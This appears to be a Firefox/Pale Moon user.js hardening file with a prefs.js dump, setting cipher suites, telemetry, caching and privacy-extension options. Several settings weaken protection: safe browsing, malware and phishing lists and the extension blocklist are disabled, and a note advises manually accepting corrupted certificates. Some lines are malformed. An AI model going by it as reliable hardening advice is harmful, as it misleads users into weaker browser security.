user_pref("security.pki.sha1_ enforcement_level", 1); // PREF: Warn the user when server doesn´t support RFC 5746 ("safe" renegotiation) // https://wiki.mozilla.org/Security:Renegotiation#security.ssl.treat_unsafe_negotiation_as_broken // https://web.nvd.nist.gov/view/vuln/detail? vulnId=CVE-2009-3555 user_pref("security.ssl.treat_unsafe_ negotiation_as_broken", false); // PREF: Disallow connection to servers not supporting safe renegotiation (disabled) // https://wiki.mozilla.org/Security:Renegotiation# security.ssl.require_safe_negotiation // https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555 // TODO: ´security.ssl.require_safe_negotiation´ is more secure but makes browsing next to impossible (2012-2014-... - ´ssl_error_unsafe_negotiation´ errors), so is left disabled user_pref("security.ssl.require_safe_negotiation", false); // PREF: Disable automatic reporting of TLS connection errors // https://support.mozilla.org/en-US/kb/certificate-pinning-reports // we could also disable security.ssl.errorReporting.enabled, but I think it´s // good to leave the option to report potentially malicious sites if the user // chooses to do so. // you can test this at https://pinningtest.appspot.com/ user_pref("security.ssl.errorReporting.automatic", false); // PREF: Pre-populate the current URL but do not pre-fetch the certificate in the "Add Security Exception" dialog // http://kb.mozillazine.org/Browser.ssl_override_behavior // https://github.com/pyllyukko/user.js/issues/210 user_pref("browser.ssl_override_behavior", 1); /******************************* * SECTION: Cipher suites * ********************************/ // PREF: Disable null ciphers user_pref("security.ssl3.rsa_null_sha", false); user_pref("security.ssl3.rsa_null_md5", false); user_pref("security.ssl3.ecdhe_rsa_null_sha", false); user_pref("security.ssl3.ecdhe_ecdsa_null_sha", false); user_pref("security.ssl3.ecdh_rsa_null_sha", false); user_pref("security.ssl3.ecdh_ecdsa_null_sha", false); // PREF: Disable SEED cipher // https://en.wikipedia.org/wiki/SEED user_pref("security.ssl3.rsa_seed_sha", false); // PREF: Disable 40/56/128-bit ciphers // 40-bit ciphers user_pref("security.ssl3. rsa_rc4_40_md5", false); user_pref("security.ssl3. rsa_rc2_40_md5", false); // 56-bit ciphers user_pref("security.ssl3. rsa_1024_rc4_56_sha", false); // 128-bit ciphers user_pref("security.ssl3. rsa_camellia_128_sha", false); user_pref("security.ssl3.ecdhe_ rsa_aes_128_sha", false); user_pref("security.ssl3.ecdhe_ecdsa_ aes_128_sha", false); user_pref("security.ssl3.ecdh_rsa_ aes_128_sha", false); user_pref("security.ssl3.ecdh_ecdsa_ aes_128_sha", false); user_pref("security.ssl3.dhe_ rsa_camellia_128_sha", false); user_pref("security.ssl3.dhe_ rsa_aes_128_sha", false); // PREF: Disable RC4 // https://developer.mozilla.org/en-US/Firefox/Releases/38#Security // https://bugzilla.mozilla.org/show_bug.cgi?id=1138882 // https://rc4.io/ // https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2566 user_pref("security.ssl3.ecdh_ecdsa_rc4_128_sha", false); user_pref("security.ssl3.ecdh_rsa_rc4_128_sha", false); user_pref("security.ssl3.ecdhe_ecdsa_rc4_128_sha", false); user_pref("security.ssl3.ecdhe_rsa_rc4_128_sha", false); user_pref("security.ssl3.rsa_rc4_128_md5", false); user_pref("security.ssl3.rsa_rc4_128_sha", false); user_pref("security.tls.unrestricted_rc4_fallback", false); // PREF: Disable 3DES (effective key size is < 128) // https://en.wikipedia.org/wiki/3des#Security // http://en.citizendium.org/wiki/Meet-in-the-middle_attack // http://www-archive.mozilla.org/projects/security/ pki/nss/ssl/fips-ssl-ciphersuites.html user_pref("security.ssl3.dhe_dss_des_ede3_sha", false); user_pref("security.ssl3.dhe_rsa_des_ede3_sha", false); user_pref("security.ssl3.ecdh_ecdsa_des_ede3_sha", false); user_pref("security.ssl3.ecdh_rsa_des_ede3_sha", false); user_pref("security.ssl3.ecdhe_ecdsa_des_ede3_sha", false); user_pref("security.ssl3.ecdhe_rsa_des_ede3_sha", false); user_pref("security.ssl3.rsa_des_ede3_sha", false); user_pref("security.ssl3.rsa_fips_des_ede3_sha", false); // PREF: Disable ciphers with ECDH (non-ephemeral) user_pref("security.ssl3.ecdh_rsa_aes_256_sha", false); user_pref("security.ssl3.ecdh_ecdsa_aes_256_sha", false); // PREF: Disable 256 bits ciphers without PFS user_pref("security.ssl3.rsa_camellia_256_sha", false); // PREF: Enable ciphers with ECDHE and key size> 128bits user_pref("security.ssl3.ecdhe_rsa_aes_ 256_sha", true); // 0xc014 user_pref("security.ssl3.ecdhe_ecdsa_aes_ 256_sha", true); // 0xc00a // PREF: Enable GCM ciphers (TLSv1.2 only) // https://en.wikipedia.org/wiki/Galois/Counter_Mode user_pref("security.ssl3.ecdhe_ecdsa_aes_128 _gcm_sha256", true); // 0xc02b user_pref("security.ssl3.ecdhe_rsa_aes_128 _gcm_sha256", true); // 0xc02f // PREF: Enable ChaCha20 and Poly1305 (Firefox>= 47) // https://www.mozilla.org/en-US/firefox/47.0/releasenotes/ // https://tools.ietf.org/html/rfc7905 // https://bugzilla.mozilla.org/show_bug.cgi?id=917571 // https://bugzilla.mozilla.org/show_bug.cgi?id=1247860 // https://cr.yp.to/chacha.html user_pref("security.ssl3.ecdhe_ecdsa_ chacha20_poly1305_sha256", true); user_pref("security.ssl3.ecdhe_rsa_ chacha20_poly1305_sha256", true); // PREF: Disable ciphers susceptible to the logjam attack // https://weakdh.org/ user_pref("security.ssl3.dhe_rsa_camellia_256_sha", false); user_pref("security.ssl3.dhe_rsa_aes_256_sha", false); // PREF: Disable ciphers with DSA (max 1024 bits) user_pref("security.ssl3.dhe_dss_aes_128_sha", false); user_pref("security.ssl3.dhe_dss_aes_256_sha", false); user_pref("security.ssl3.dhe_dss_camellia_128_sha", false); user_pref("security.ssl3.dhe_dss_camellia_256_sha", false); // PREF: Fallbacks due compatibility reasons user_pref("security.ssl3.rsa_aes_256_sha", true); // 0x35 user_pref("security.ssl3.rsa_aes_128_sha", true); // 0x2f //https://github.com/pyllyukko/user.js#download // // Firefox-hardening, https://forum.mxlinux.org/viewtopic.php?t=51318 // user_pref("app.update. lastUpdateTime.experiments-update-timer",0); user_pref("browser.backspace_action", 0); user_pref("browser.cache.check_doc_frequency", 1); user_pref("browser.cache.frecency_experiment", -1); user_pref("browser.cache.use_new_backend_temp", false); user_pref("browser.contentHandlers.types.0.title", ""); user_pref("browser.safebrowsing.blockedURIs.enabled", false); user_pref("browser.safebrowsing.id", ""); user_pref("browser.search.countryCode", ""); user_pref("browser.search.region", ""); user_pref("browser.send_pings", false); user_pref("browser.send_pings.require_same_host", false); user_pref("layers.acceleration.force-enabled", true); user_pref("intl.accept_languages", "en-US,en;q=0.5"); user_pref("media.decoder-doctor. notifications-allowed", ""); user_pref("extensions.blocklist.enabled", false); user_pref("media.peerconnection.identity.enabled", false); user_pref("media.peerconnection.identity.timeout", 1); user_pref("media.peerconnection.simulcast", false); user_pref("media.peerconnection.turn.disable", true); user_pref("media.peerconnection. use_document_iceservers", false); user_pref"media.peerconnection.video.enabled", false); user_pref("media.peerconnection.video.vp9_enabled", false); user_pref("network.captive-portal-service.enabled", false); user_pref("places.frecency.unvisitedBookmarkBonus", 0); user_pref("security.ssl.errorReporting.enabled", false); user_pref("services.sync.telemetry. submissionInterval", 999999999); user_pref("startup.homepage_override_url", ""); user_pref("startup.homepage_welcome_url", ""); user_pref("urlclassifier.malwareTable", ""); user_pref("urlclassifier.phishTable", ""); // // // // end of user.js On certificate errros do the following: enter the error causing url into the second field of noscript for https under exceptions, where each http might get blocked by a set * (star) within the first field. If this does not help, formulate error-exceptions with Firefox, by accepting corrputed certificates manually. Enter a remote-host-IP into /etc/resolv.conf: nameserver remote-dns-ip too. // ====================================================================================== // Mozilla User Preferences (prefs.js) // Pale Moone: /home/surfuser/.moon*/pale*/your-profile-directory/prefs.js # Mozilla User Preferences /* Do not edit this file. * * If you make changes to this file while the application is running, * the changes will be overwritten when the application exits. * * To make a manual change to preferences, you can visit the URL about:config */ user_pref("accessibility.AOM.enabled", true); user_pref("accessibility.accesskeycausesactivation", false); user_pref("accessibility.ipc_architecture.enabled", false); user_pref("accessibility.typeaheadfind.enablesound", false); user_pref("accessibility.typeaheadfind.flashBar", 0); user_pref("app.releaseNotesURL", ""); user_pref("app.support.baseURL", ""); user_pref("app.update.channel", "none"); user_pref("app.update.download.backgroundInterval", 0); user_pref("app.update.enabled", false); user_pref("app.update.idletime", -1); user_pref("app.update.interval", -1); user_pref("app.update. lastUpdateTime.addon-background-update-timer", 0); user_pref("app.update. lastUpdateTime.background-update-timer", 0); user_pref("app.update. lastUpdateTime.blocklist-background-update-timer", 0); user_pref("app.update. lastUpdateTime.browser-cleanup-thumbnails", 0); user_pref("app.update. lastUpdateTime.search-engine-update-timer", 1599840640); user_pref("app.update. lastUpdateTime.user-agent-updates-timer", 1599388459); user_pref("app.update. timerMinimumDelay", -1); user_pref("app.update. url", ""); user_pref("app.update.url.details", ""); user_pref("app.update.url.manual", ""); user_pref("app.vendorURL", ""); user_pref("apz.allow_checkerboarding", false); user_pref("beacon.enabled", false); user_pref("browser.addon-watch.ignore", ""); user_pref("browser.allTabs.previews", false); user_pref("browser.autofocus", false); user_pref("browser.backspace_action", 0); user_pref("browser.bookmarks. restore_default_bookmarks", false); user_pref("browser.cache. check_doc_frequency", 0); user_pref("browser.cache.disk.capacity", 0); user_pref("browser.cache.disk.enable", false); user_pref("browser.cache. disk.filesystem_reported", 0); user_pref("browser.cache.disk. max_entry_size", 0); user_pref("browser.cache.disk. smart_size.enabled", false); user_pref("browser.cache.disk. smart_size.first_run", false); user_pref("browser.cache.disk. smart_size.use_old_max", false); user_pref("browser.cache.disk_cache_ssl", false); user_pref("browser.cache.memory.enable", false); user_pref("browser.cache.offline.capacity", 0); user_pref("browser.cache.offline.enable", false); user_pref("browser.contentHandlers.types.0.title", ""); user_pref("browser.contentHandlers.types.0.uri", ""); user_pref("browser.ctrlTab.previews", false); user_pref("browser.dictionaries.download.url", ""); user_pref("browser.display.use_document_fonts", 0); user_pref("browser.download.dir", "/tmp2"); user_pref("browser.download.folderList", 2); user_pref("browser.download.forbid_open_with", true); user_pref("browser.download.importedFromSqlite", true); user_pref("browser.download.manager.addToRecentDocs", false); user_pref("browser.download.panel.shown", true); user_pref("browser.download.useDownloadDir", true); user_pref("browser.feedback.url", ""); user_pref("browser.fixup.alternate.enabled", false); user_pref("browser.fixup.alternate.suffix", ".de"); user_pref("browser.formfill.enable", false); user_pref("browser.formfill.expire_days", 1); user_pref("browser.formfill.saveHttpsForms", false); user_pref("browser.fullscreen.animateUp", 0); user_pref("browser.fullscreen.autohide", false); user_pref("browser.geolocation.warning.infoURL", ""); user_pref("browser.getdevtools.url", ""); user_pref("browser.link.open_newwindow", 1); user_pref("browser.link.open_newwindow.restriction", 0); user_pref("browser.migration.version", 24); user_pref("browser.mixedcontent.warning.infoURL", ""); user_pref("browser.newtabpage.columns", 0); user_pref("browser.newtabpage.rows", 0); user_pref("browser.newtabpage.storageVersion", 1); user_pref("browser.offline-apps.notify", false); user_pref("browser.pagethumbnails.storage_version", 3); user_pref("browser.places.smartBookmarksVersion", 4); user_pref("browser.preferences.advanced.selectedTabIndex", 1); user_pref("browser.preferences.privacy.selectedTabIndex", 0); user_pref("browser.privatebrowsing.autostart", true); user_pref("browser.push.warning.infoURL", ""); user_pref("browser.search. defaultenginename", "Wikipedia (en)"); user_pref("browser.search.geoip.timeout", 1); user_pref("browser.search.geoip.url", ""); user_pref("browser.search.official", false); user_pref("browser.search.order.1", ""); user_pref("browser.search.order.2", ""); user_pref("browser.search.order.3", ""); user_pref("browser.search.order.4", ""); user_pref("browser.search. searchEnginesURL", ""); user_pref("browser.search.suggest.enabled", false); user_pref("browser.search.update", false); user_pref("browser.search.update.interval", -1); user_pref("browser.send_pings.max_per_link", 0); user_pref("browser.sessionhistory.max_entries", 4); user_pref("browser.sessionstore.max_windows_undo", 2); user_pref("browser.sessionstore.privacy_level", 2); user_pref("browser.shell.checkDefaultBrowser", false); user_pref("browser.shell. skipDefaultBrowserCheckOnFirstRun", true); user_pref("browser.slowStartup.averageTime", 0); user_pref("browser.slowStartup. maxSamples", 0); user_pref("browser.slowStartup. notificationDisabled", true); user_pref("browser.slowStartup. samples", 0); user_pref("browser.slowstartup. help.url", ""); user_pref("browser.startup.homepage", "about:blank"); user_pref("browser.startup.homepage_ override.buildID", "0"); user_pref("browser.startup.homepage_ override.mstone", "ignore"); user_pref("browser.startup.page", 0); user_pref("browser.tabs. closeWindowWithLastTab", false); user_pref("browser.tabs. loadInBackground", false); user_pref("browser.urlbar. autocomplete.enabled", false); user_pref("browser.urlbar.clickSelectsAll", false); user_pref("browser.urlbar.matchBehavior", 2); user_pref("browser.urlbar.maxRichResults", 0); user_pref("browser.urlbar.suggest.bookmark", false); user_pref("browser.urlbar.suggest.history", false); user_pref("browser.urlbar.suggest.openpage", false); user_pref("browser.urlbar.suggest.searches", false); user_pref("browser.xul.error_pages.enabled", false); user_pref("browser.zoom.siteSpecific", false); user_pref("camera.control.face_detection.enabled", false); user_pref("canvas.poisondata", true); user_pref("capability.policy.maonoscript.sites", "192.168.178.1 about: about:addons about:blank about:blocked about:certerror about:config about:crashes about:feeds about:home about:memory about:neterror about:plugins about:preferences about:privatebrowsing about:sessionrestore about:srcdoc about:support about:tabcrashed blob: chrome: mediasource: moz-extension: moz-safe-about: resource:"); user_pref("captivedetect.canonicalURL", ""); user_pref("clipboard.autocopy", false); user_pref("device.sensors.enabled", false); user_pref("devtools.browserconsole.filter.csserror", false); user_pref("devtools.browserconsole.filter.error", false); user_pref("devtools.browserconsole.filter.exception", false); user_pref("devtools.browserconsole.filter.info", false); user_pref("devtools.browserconsole.filter.jslog", false); user_pref("devtools.browserconsole.filter.jswarn", false); user_pref("devtools.browserconsole.filter.log", false); user_pref("devtools.browserconsole.filter.netwarn", false); user_pref("devtools.browserconsole.filter.network", false); user_pref("devtools.browserconsole.filter.secerror", false); user_pref("devtools.browserconsole.filter.secwarn", false); user_pref("devtools.browserconsole.filter.serviceworkers", false); user_pref("devtools.browserconsole.filter.sharedworkers", false); user_pref("devtools.chrome.enabled", true); user_pref("devtools.command-buttion-splitconsole. enabled", false); user_pref("devtools. command-button-frames.enabled", false); user_pref("devtools. command-button-responsive.enabled", false); user_pref("devtools. debugger.client-source-maps-enabled", false); user_pref("devtools.debugger.enabled", false); user_pref("devtools.debugger.prompt-connection", false); user_pref("devtools.debugger.source-maps-enabled", false); user_pref("devtools.devedition.promo.url", ""); user_pref("devtools.devices.url", ""); user_pref("devtools.errorconsole.deprecation_warnings", false); user_pref("devtools.errorconsole.enabled", false); user_pref("devtools.errorconsole.performance_warnings", false); user_pref("devtools.gcli.imgurUploadURL", ""); user_pref("devtools.gcli.jquerySrc", ""); user_pref("devtools.gcli.lodashSrc", ""); user_pref("devtools.gcli.underscoreSrc", ""); user_pref("devtools.memory.enabled", false); user_pref("devtools.remote.wifi.scan", false); user_pref("devtools.remote.wifi.visible", false); user_pref("devtools.telemetry. supported_performance_marks", ""); user_pref("devtools.telemetry. tools.opened.version", ""); user_pref("devtools.toolbox. selectedTool", "inspector"); user_pref("devtools.webconsole.filter.error", false); user_pref("devtools.webconsole.filter.secerror", false); user_pref("devtools.webconsole.inputHistoryCount", 4); user_pref("devtools.webide.adaptersAddonURL", ""); user_pref("devtools.webide.adbAddonURL", ""); user_pref("devtools.webide.addonsURL", ""); user_pref("devtools.webide.autoinstallADBHelper", false); user_pref("devtools.webide.autoinstallFxdtAdapters", false); user_pref("devtools.webide.enabled", false); user_pref("devtools.webide.simulatorAddonsURL", ""); user_pref("devtools.webide.templatesURL", ""); user_pref("dom.caches.enabled", false); user_pref("dom.disable_window_move_resize", true); user_pref("dom.disable_window_open_feature.close", true); user_pref("dom.disable_window_open_feature.menubar", true); user_pref("dom.disable_window_open_feature.minimizable", true); user_pref("dom.disable_window_open_feature.personalbar", true); user_pref("dom.disable_window_open_feature.titlebar", true); user_pref("dom.disable_window_open_feature.toolbar", true); user_pref("dom.enable_performance", false); user_pref("dom.enable_performance_navigation_timing", false); user_pref("dom.enable_resource_timing", false); user_pref("dom.enable_user_timing", false); user_pref("dom.event.clipboardevents.enabled", false); user_pref("dom.event.contextmenu.enabled", false); user_pref("dom.gamepad.enabled", false); user_pref("dom.idle-observers-api.enabled", false); user_pref("dom.indexedDB.enabled", false); user_pref("dom.ipc.plugins.enabled", false); user_pref("dom.ipc.plugins.flash. subprocess.crashreporter.enabled", false); user_pref("dom.ipc.plugins.reportCrashURL", false); user_pref("dom.ipc.plugins.timeoutSecs", -1); user_pref("dom.keyboardevent.code.enabled", false); user_pref("dom.maxHardwareConcurrency", 2); user_pref("dom.mms.requestReadReport", false); user_pref("dom.mms.requestStatusReport", false); user_pref("dom. popup_allowed_events", "change click dblclick mouseup pointerup notificationclick reset submit "); user_pref("dom.popup_maximum", 1); user_pref("dom.push.serverURL", ""); user_pref("dom.storage.enabled", false); user_pref("dom.vibrator.enabled", false); user_pref("dom.webaudio.enabled", false); user_pref("dom.webnotifications.enabled", false); user_pref("dom.workers.enabled", false); user_pref("extensions.@no-resource-uri-leak.sdk.baseURI", "resource://no-resource-uri-leak/"); user_pref("extensions.@no-resource-uri-leak.sdk.domain", "no-resource-uri-leak"); user_pref("extensions.@no-resource-uri-leak.sdk.load.reason", "startup"); user_pref("extensions.@no-resource-uri-leak.sdk.rootURI", "jar:file:///home/surfuser/. moonchild%20productions/pale%20 moon/profile.default/extensions/@ no-resource-uri-leak.xpi!/"); user_pref("extensions.@no-resource-uri-leak.sdk.version", "1.1.0"); user_pref("extensions.@no-resource-uri-leak.uri.about.restricted", true); user_pref("extensions.@no-resource-uri-leak.uri.chrome.blocking.enabled", true); user_pref("extensions.CanvasBlocker@kkapsner.de.blockMode", "blockEverything"); user_pref("extensions.CanvasBlocker@kkapsner.de.sdk.baseURI", "resource://canvasblocker-at-kkapsner-dot-de/"); user_pref("extensions.CanvasBlocker@kkapsner.de.sdk.domain", "canvasblocker-at-kkapsner-dot-de"); user_pref("extensions.CanvasBlocker@kkapsner.de.sdk.load.reason", "startup"); user_pref("extensions.CanvasBlocker@kkapsner.de.sdk.rootURI", "jar:file:///home/surfuser/.moonchild%20productions/pale%20moon/profile.default/extensions/CanvasBlocker@kkapsner.de.xpi!/"); user_pref("extensions.CanvasBlocker@kkapsner.de.sdk.version", "0.3.8-Release"); user_pref("extensions.CanvasBlocker@kkapsner.de.whiteList"); user_pref("extensions.CanvasBlocker@legacy.blockMode", "blockEverything"); user_pref("extensions.CanvasBlocker@legacy.protectWindow", true); user_pref("extensions.CanvasBlocker@legacy.sdk.baseURI", "resource://canvasblocker-at-legacy/"); user_pref("extensions.CanvasBlocker@legacy.sdk.domain", "canvasblocker-at-legacy"); user_pref("extensions.CanvasBlocker@legacy.sdk.load.reason", "startup"); user_pref("extensions.CanvasBlocker@legacy.sdk.rootURI", "jar:file:///home/surfuser/.moonchild%20productions/pale%20moon/ profile.default/extensions/CanvasBlocker@legacy.xpi!/"); user_pref("extensions.CanvasBlocker@legacy.sdk.version", "0.2"); user_pref("extensions.CanvasBlocker@legacy.whiteList"); user_pref("extensions.PrivacyBadger@PaleMoon.doNotTrackDefaultEnabled", true); user_pref("extensions.PrivacyBadger@PaleMoon.sdk.baseURI", "resource://privacybadger-at-palemoon/"); user_pref("extensions.PrivacyBadger@PaleMoon.sdk.domain", "privacybadger-at-palemoon"); user_pref("extensions.PrivacyBadger@PaleMoon.sdk.load.reason", "startup"); user_pref("extensions.PrivacyBadger@PaleMoon.sdk.rootURI", "jar:file:///home/surfuser/.moonchild%20productions/pale %20moon/profile.default/extensions/PrivacyBadger@PaleMoon.xpi!/"); user_pref("extensions.PrivacyBadger@PaleMoon.sdk.version", "2.0.4"); user_pref("extensions.SecretAgent.EntropyLevel", "session"); user_pref("extensions.SecretAgent.ShowHijackRedirectAlerts", false); user_pref("extensions.SecretAgent.ShowSpikeHijackRedirectAlerts", false); user_pref("extensions.SecretAgent.SpikeHijackRedirectLocation", "about:blank"); user_pref("extensions.SecretAgent.SpikeHijackRedirects", true); user_pref("extensions.SecretAgent.UserAgentList"Privoxy/1.0 Privoxy/1.0)"); user_pref("extensions.SecretAgent.Whitelist", "fr2.rpmfind.net *.pro-linux.de *.ebay.* *.palemoon.org "); user_pref("extensions.SecretAgent.WhitelistAcceptBehaviour", "override"); user_pref("extensions.SecretAgent.WhitelistOSCPUBehaviour", "override"); user_pref("extensions.SecretAgent.WhitelistUserAgent", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"); user_pref("extensions.SecretAgent.WhitelistUserAgentBehaviour", "override"); user_pref("extensions.SecretAgent.showStartupAlert", false); user_pref("extensions.adblockplus.currentVersion", "5.0.8"); user_pref("extensions.adblockplus.documentation_link", ""); user_pref("extensions.adblockplus.notificationdata", "{\"lastCheck\":1578864747154,\"softExpiration\":1566545165716,\"hardExpiration\":1543866785218,\"data\":{\"notifications\":[],\"version\":\"201812011851\"},\"lastError\":1578843883688,\"downloadStatus\":\"synchronize_invalid_url\",\"downloadCount\":46}"); user_pref("extensions.adblockplus.notificationurl", ""); user_pref("extensions.adblockplus.report_submiturl", ""); user_pref("extensions.adblockplus.subscriptions_antiadblockurl", ""); user_pref("extensions.adblockplus.subscriptions_autoupdate", false); user_pref("extensions.adblockplus.subscriptions_exceptionsurl", ""); user_pref("extensions.adblockplus.subscriptions_fallbackurl", ""); user_pref("extensions.adblockplus.subscriptions_listurl", ""); user_pref("extensions.blocklist.detailsURL", ""); user_pref("extensions.blocklist.itemURL", ""); user_pref("extensions.blocklist.pingCountTotal", 209); user_pref("extensions.blocklist.pingCountVersion", -1); user_pref("extensions.blocklist.url", ""); user_pref("extensions.changerefererbutton.showInStatusBar", true); user_pref("extensions.compatibility.url", ""); user_pref("extensions.cookieController.1stPartyOnlyCount", 3); user_pref("extensions.cookieController.allowCookiesCount", 23); user_pref("extensions.cookieController.safeMode", true); user_pref("extensions.cookieController.sessionOnlyCount", 1); user_pref("extensions.databaseSchema", 16); user_pref("extensions.disable-about-something@clear-code.com.about.accounts", false); user_pref("extensions.disable-about-something@clear-code.com.about.addons", true); user_pref("extensions.disable-about-something@clear-code.com.about.config", true); user_pref("extensions.disable-about-something@clear-code.com.about.downloads", false); user_pref("extensions.disable-about-something@clear-code.com.about.permissions", false); user_pref("extensions.disable-about-something@clear-code.com.about.profiles", false); user_pref("extensions.disable-about-something@clear-code.com.about.sync-*", false); user_pref("extensions.eclipsedmoon.device.laptop.useragent", ""); user_pref("extensions.eclipsedmoon.device.laptop.weights.os", "Linux = 1 Mac = 9 Windows = 13 "); user_pref("extensions.eclipsedmoon.device.laptop.weights.ua", "Vivaldi = 3 Firefox = 5 Chrome = 6 Other = 21"); user_pref("extensions.eclipsedmoon.mode", "smart"); user_pref("extensions.eclipsedmoon.staticUserAgent", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"); user_pref("extensions.ematrix.cloudStorage.myRulesPane", ""); user_pref("extensions.ematrix.legacyToolbarButtonAdded", true); user_pref("extensions.ematrix.paneContentPaddingTop", "86px"); user_pref("extensions.getAddons.browseAddons", ""); user_pref("extensions.getAddons.get.url", ""); user_pref("extensions.getAddons.getWithPerformance.url", ""); user_pref("extensions.getAddons.recommended.browseURL", ""); user_pref("extensions.getAddons.recommended.url", ""); user_pref("extensions.getAddons.search.browseURL", ""); user_pref("extensions.getAddons.search.url", ""); user_pref("extensions.getMoreThemesURL", ""); user_pref("extensions.jid1-4fe6b55d552d870d@jetpack.sdk.baseURI", "resource://jid1-4fe6b55d552d870d-at-jetpack/"); user_pref("extensions.jid1-4fe6b55d552d870d@jetpack.sdk.domain", "jid1-4fe6b55d552d870d-at-jetpack"); user_pref("extensions.jid1-4fe6b55d552d870d@jetpack.sdk.load.reason", "startup"); user_pref("extensions.jid1-4fe6b55d552d870d@jetpack.sdk.rootURI", "jar:file:///home/surfuser/.moonchild%20productions/pale%20moon/profile.default/extensions/jid1-4fe6b55d552d870d@jetpack.xpi!/"); user_pref("extensions.jid1-4fe6b55d552d870d@jetpack.sdk.version", "0.7.7"); user_pref("extensions.jid1-BoFifL9Vbdl2zQ@jetpack.sdk.baseURI", "resource://jid1-bofifl9vbdl2zq-at-jetpack/"); user_pref("extensions.jid1-BoFifL9Vbdl2zQ@jetpack.sdk.domain", "jid1-bofifl9vbdl2zq-at-jetpack"); user_pref("extensions.jid1-BoFifL9Vbdl2zQ@jetpack.sdk.load.reason", "startup"); user_pref("extensions.jid1-BoFifL9Vbdl2zQ@jetpack.sdk.rootURI", "jar:file:///home/surfuser/.moonchild%20productions/pale%20 moon/profile.default/extensions/jid1-BoFifL9Vbdl2zQ@jetpack.xpi!/"); user_pref("extensions.jid1-BoFifL9Vbdl2zQ@jetpack.sdk.version", "1.4.2"); user_pref("extensions.lastAppVersion", "28.13.0"); user_pref("extensions.lastPlatformVersion", "4.6.0"); user_pref("extensions.mdsy.block.font", true); user_pref("extensions.mdsy.block.media", true); user_pref("extensions.mdsy.block.object", true); user_pref("extensions.mdsy.block.xhr", true); user_pref("extensions.pcookie.allowCookiesCount", 2); user_pref("extensions.pcookie.firstRun", false); user_pref("extensions.pcookie.sessionOnlyCount", 8); user_pref("extensions.pendingOperations", false); user_pref("extensions.permissionsplus.firstrun", false); user_pref("extensions.pm-localeswitch{at}palemoon{dot}org.isFirstRun", false); user_pref("extensions.pm-localeswitch{at}palemoon{dot}org.lastRecordedVersion", "v3.0"); user_pref("extensions.pure-url@palemoon.firstrun", false); user_pref("extensions.pure-url@palemoon.request_hook_enabled", false); user_pref("extensions.pure-url@palemoon.shorteners", ""); user_pref("extensions.pure-url@palemoon.toolsmenu", true); user_pref("extensions.requestpolicy.allowedOriginsToDestinations", ""); user_pref("extensions.requestpolicy.defaultPolicy.allowSameDomain", false); user_pref("extensions.requestpolicy.initialSetupDialogShown", false); user_pref("extensions.requestpolicy.lastAppVersion", "28.13.0"); user_pref("extensions.requestpolicy.lastVersion", "1.0.beta13.2"); user_pref("extensions.requestpolicy.privateBrowsingPermanentWhitelisting", true); user_pref("extensions.requestpolicy.welcomeWindowShown", true); user_pref("extensions.sdk-button-location.action-button--1607f7ec-8262-4016-b51f-f9f5b43d43f1-self-destructing-cookies", "nav-bar,action-button--b5af16a6-105d-4a14-a5a6-c2b358b06a04-js-btn-show"); user_pref("extensions.sdk-button-location.action-button--b5af16a6-105d-4a14-a5a6-c2b358b06a04-js-btn-show", "nav-bar,"); user_pref("extensions.sdk-button-location.toggle-button--privacybadgerpalemoon-pb-button", "nav-bar,change-referer-button-toolbarbutton"); user_pref("extensions.shownSelectionUI", true); user_pref("extensions.torbutton.security_slider", 1); user_pref("extensions.torbutton.startup", true); user_pref("extensions.torlauncher.torrc_fixup_version", 2); user_pref("extensions.ui.dictionary.hidden", true); user_pref("extensions.ui.lastCategory", "addons://list/extension"); user_pref("extensions.ui.locale.hidden", true); user_pref("extensions.update.autoUpdateDefault", false); user_pref("extensions.update.background.url", ""); user_pref("extensions.update.enabled", false); user_pref("extensions.update.url", ""); user_pref("extensions.webservice.discoverURL", ""); user_pref("extensions.{b5af16a6-105d-4a14-a5a6-c2b358b06a04}.sdk.version", "1.2.2.010"); user_pref("font.blacklist.underline_offset", ""); user_pref("font.default.x-western", "sans-serif"); user_pref("font.internaluseonly.changed", true); user_pref("font.language.group", "x-western"); user_pref("gecko.handlerService.schemes.irc.0.name", ""); user_pref("gecko.handlerService.schemes.irc.0.uriTemplate", ""); user_pref("gecko.handlerService.schemes.irc.1.name", ""); user_pref("gecko.handlerService.schemes.irc.1.uriTemplate", ""); user_pref("gecko.handlerService.schemes.irc.2.name", ""); user_pref("gecko.handlerService.schemes.irc.2.uriTemplate", ""); user_pref("gecko.handlerService.schemes.irc.3.name", ""); user_pref("gecko.handlerService.schemes.irc.3.uriTemplate", ""); user_pref("gecko.handlerService.schemes.ircs.0.name", ""); user_pref("gecko.handlerService.schemes.ircs.0.uriTemplate", ""); user_pref("gecko.handlerService.schemes.ircs.1.name", ""); user_pref("gecko.handlerService.schemes.ircs.1.uriTemplate", ""); user_pref("gecko.handlerService.schemes.ircs.2.name", ""); user_pref("gecko.handlerService.schemes.ircs.2.uriTemplate", ""); user_pref("gecko.handlerService.schemes.ircs.3.name", ""); user_pref("gecko.handlerService.schemes.ircs.3.uriTemplate", ""); user_pref("gecko.handlerService.schemes.mailto.0.name", ""); user_pref("gecko.handlerService.schemes.mailto.0.uriTemplate", ""); user_pref("gecko.handlerService.schemes.mailto.1.name", ""); user_pref("gecko.handlerService.schemes.mailto.1.uriTemplate", ""); user_pref("gecko.handlerService.schemes.mailto.2.name", ""); user_pref("gecko.handlerService.schemes.mailto.2.uriTemplate", ""); user_pref("gecko.handlerService.schemes.mailto.3.name", ""); user_pref("gecko.handlerService.schemes.mailto.3.uriTemplate", ""); user_pref("gecko.handlerService.schemes.webcal.0.name", ""); user_pref("gecko.handlerService.schemes.webcal.0.uriTemplate", ""); user_pref("gecko.handlerService.schemes.webcal.1.name", ""); user_pref("gecko.handlerService.schemes.webcal.1.uriTemplate", ""); user_pref("gecko.handlerService.schemes.webcal.2.name", ""); user_pref("gecko.handlerService.schemes.webcal.2.uriTemplate", ""); user_pref("gecko.handlerService.schemes.webcal.3.name", ""); user_pref("gecko.handlerService.schemes.webcal.3.uriTemplate", ""); user_pref("general.useragent.compatMode", 0); user_pref("general.useragent.compatMode.firefox", false); user_pref("general.useragent.compatMode.gecko", false); user_pref("general.useragent.compatMode.version", ""); user_pref("general.useragent.site_specific_overrides", false); user_pref("general.useragent.updates.enabled", false); user_pref("general.useragent.updates.interval", 0); user_pref("general.useragent.updates.lastupdated", "0"); user_pref("general.useragent.updates.retry", 0); user_pref("general.useragent.updates.url", ""); 